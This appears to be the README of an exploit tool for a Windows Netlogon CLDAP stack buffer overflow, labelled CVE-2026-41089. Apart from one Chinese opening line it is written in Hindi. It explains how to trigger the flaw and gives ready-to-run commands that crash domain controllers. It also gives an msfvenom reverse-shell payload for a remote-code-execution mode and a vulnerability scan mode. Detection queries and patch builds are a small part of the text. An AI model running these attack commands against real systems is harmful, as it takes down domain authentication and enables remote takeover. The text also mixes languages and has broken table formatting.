
CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。
CVE-ID: CVE-2026-41089
CVSS: 9.8 (गंभीर)
CWE: CWE-121 (स्टैक-आधारित बफर ओवरफ्लो)
हमला वेक्टर: UDP/389 (CLDAP SearchRequest)
प्रभाव: दूरस्थ कोड निष्पादन (RCE) / सेवा अस्वीकार (DoS)
प्रभावित संस्करण: विंडोज सर्वर 2012 R2 ~ 2025 (डोमेन कंट्रोलर)
पैच: मई 2026 संचयी अद्यतन
netlogon.dll में NetpLogonPutUnicodeString फ़ंक्शन में CLDAP खोज अनुरोधों को संसाधित करते समय स्टैक बफर ओवरफ्लो भेद्यता है। यह फ़ंक्शन बाइट लंबाई बजट प्राप्त करता है, लेकिन इसे WCHAR गणना के रूप में व्याख्यायित करता है, जिसके परिणामस्वरूप लेखन अपेक्षित से 2 गुना होता है।
ओवरफ्लो NlGetLocalPingResponse फ़ंक्शन के 528 बाइट (264 ushort) फिक्स्ड स्टैक बफर में होता है। हमलावर-नियंत्रित User फ़ील्ड और सर्वर का स्वयं का DNS डोमेन नाम इस बफर को भरते हैं, अंततः GS सुरक्षा कुकी को ओवरराइट करते हैं, जिससे __report_gsfailure और lsass.exe क्रैश होता है।
NtVer=0x02 (पुराने, भेद्य BuildSamLogonResponse पथ का उपयोग बाध्य करता है)User फ़ील्ड की लंबाई ≥ ~130 वर्ण (बाइनरी सीमा लगभग 260 बाइट UTF-16)नोट:
NtVer=0x16(कई सार्वजनिक डिटेक्शन स्क्रिप्ट द्वारा उपयोग किया गया मान) सुरक्षितBuildSamLogonResponseExपथ को ट्रिगर करता है, भेद्यता को ट्रिगर नहीं करता।
| मोड | विवरण |
|---|---|
--mode dos |
एक एकल पैकेट lsass.exe को क्रैश कर सकता है, जिससे डोमेन कंट्रोलर लगभग 30-60 सेकंड में रीबूट हो जाता है। इस अवधि के दौरान उस DC के सभी डोमेन प्रमाणीकरण विफल होंगे।
# मूल उपयोग — 3 पैकेट भेजें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos
# एकल पैकेट त्वरित हमला
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1
# आक्रामक मोड — 5 पैकेट एक साथ
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1
⚠️ अनुसंधान स्तर — वास्तविक वातावरण में अविश्वसनीय और अस्थिर।
RCE निम्नलिखित चुनौतियों का सामना करता है:
# शेलकोड उत्पन्न करें
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
-f raw -o shellcode.bin
# RCE पेलोड भेजें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
--shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444
# लक्ष्य DC की फिंगरप्रिंटिंग करें
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan
अपेक्षित आउटपुट उदाहरण (पैच किया गया लक्ष्य):
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)
अपेक्षित आउटपुट उदाहरण (अपैच किया गया लक्ष्य):
NtVer=0x00000002 → TIMEOUT (5001 ms) ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)
यदि NtVer=0x02 टाइमआउट करता है जबकि अन्य संस्करण सामान्य रूप से प्रतिक्रिया देते हैं, तो लक्ष्य संभवतः भेद्य है।
# विंडोज सर्वर (अपैच) पर लंबा डोमेन नाम वाला DC बनाएँ:
# 1. डोमेन कंट्रोलर के रूप में पदोन्नत करें (बहुत लंबा DNS डोमेन नाम, जैसे "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. सुनिश्चित करें कि मई 2026 से पहले का पैच स्थापित है
# 3. हमलावर मशीन से चलाएँ:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. DC के क्रैश और रीबूट का निरीक्षण करें
User > 100 बाइट और NtVer = 0x02Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)
index=wineventlog source="WinEventLog:Application" EventID=1000
Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"
यह टूल केवल अधिकृत सुरक्षा मूल्यांकन, पैठ परीक्षण, CTF प्रतियोगिताओं और रक्षा अनुसंधान के लिए है। स्पष्ट लिखित प्राधिकरण के बिना किसी भी सिस्टम पर इस टूल का उपयोग अवैध है। उपयोगकर्ता सभी कानूनी दायित्व स्वयं वहन करता है।
| विशेष रूप से तैयार किया गया CLDAP पैकेट भेजता है, जिससे LSASS क्रैश होता है और DC रिबूट होता है (~60 सेकंड प्रमाणीकरण डाउनटाइम) |
--mode rce | दूरस्थ कोड निष्पादन का प्रयास (अनुसंधान स्तर, शेलकोड की आवश्यकता है) |
--mode scan | विभिन्न NtVer मानों के प्रति प्रतिक्रियाओं को स्कैन करता है, लक्ष्य DC की फिंगरप्रिंटिंग करता है |
--mode auto | स्वचालित रूप से पता लगाता है और सर्वोत्तम हमला रणनीति चुनता है |
| पैरामीटर | विवरण | डिफ़ॉल्ट |
|---|
-l, --user-len | उपयोगकर्ता नाम फ़ील्ड की लंबाई (ASCII वर्ण) | 180 |
--ntver | NtVer मान (हेक्स, जैसे 0x02) | 0x02 |
--count | भेजे जाने वाले DoS पैकेट की संख्या | 3 |
--delay | पैकेट के बीच विलंब (सेकंड) | 0.5 |
-t, --timeout | सॉकेट टाइमआउट (सेकंड) | 5.0 |
--json | JSON प्रारूप में परिणाम आउटपुट करें | — |
--raw | भेजने से पहले कच्चा पैकेट हेक्स प्रिंट करें | — |
--quiet | बैनर आउटपुट दबाएँ | — |
--shellcode-file | कस्टम शेलकोड फ़ाइल (रॉ x64) | — |
--lhost | रिवर्स शेल श्रवण पता | — |
--lport | रिवर्स शेल श्रवण पोर्ट | 4444 |
| विंडोज सर्वर संस्करण | पैच बिल्ड संख्या | नोट्स |
|---|
| सर्वर 2012 | 6.2.9200.26079 | ESU |
| सर्वर 2012 R2 | 6.3.9600.23181 | ESU |
| सर्वर 2016 | 10.0.14393.9140 | |
| सर्वर 2019 | 10.0.17763.8755 | |
| सर्वर 2022 | 10.0.20348.5074 | |
| सर्वर 2022 23H2 | 10.0.25398.2330 | |
| सर्वर 2025 | 10.0.26100.32772 |